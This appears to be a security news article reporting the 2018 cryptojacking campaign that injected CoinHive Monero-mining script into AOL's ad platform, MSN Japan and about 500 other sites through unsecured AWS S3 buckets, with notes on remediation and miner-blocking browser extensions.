March 25th, 2018, malicious hackers compromised AOL’s advertising platform and modified its script to mine Monero cryptocurrency. The information security training researchers at Trend Mirco also found MSN’s web portal’s Japanese domain was also infected by a similar script to mine Monero coins from the computing power of site’s visitors.
As per analysis, the compromised ads were found creating a large number of web miners. What is noteworthy is that in the case of MSN, its homepage was infected with the mining script which happens to be the default page of Microsoft’s browser and the page that Outlook (Hotmail and Live) users are redirected to once they log out from their account.
Moreover, analysts identified 500 other websites infected with the same CoinHive cryptocurrency mining script used on AOL advertising platform.
Upon further analysis, information security training researchers discovered that hackers were running their campaign by hosting malicious content on unsecured Amazon Web Service (AWS) S3 buckets left open for public access apparently by their administrators.
Unsecured AWS buckets have been creating problems for the last couple of years, however, when it comes to cryptocurrency mining Tesla cloud server and LA Times’ website had their AWS buckets compromised to mine Monero cryptocurrency.
As for web miners on AOL and MSN, the Trend Micro information security training professionals believe that a significant number is users may have been impacted. However, the good news is that AOL was notified about the incident whose team was quick to remove the malicious script by March 27th, 2018.
“The campaign injected malicious script at the end of a JavaScript library on the unsecured S3 buckets. Website administrators can easily check for any script injected with code similar to the one shown below or the mining domains we listed in the Indicators of Compromise section to verify if their sites have been modified,” wrote Trend Micro.
We notified the AOL team about our findings. AOL removed the injected miner and resolved the issue by March 27.
This is not the first time when a topnotch website had its advertising platform compromised. In January this year hackers used ad slots on YouTube to mine Monero cryptocurrency through CoinHive Javascript code.
“Organizations should secure and always properly configure their servers to prevent these types of threats. To further protect themselves, they should choose the right cloud security solution based on their specific needs,” concluded the information security training experts.
There are several ways of blocking cryptocurrency minors from using your browser and CPU power including minerBlock and No Coin extensions on Chrome web store developed for the sole purpose of blocking cryptocurrency mining and cryptojacking. Both extensions are open source and open to the public, users can check out the source code on Github.
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.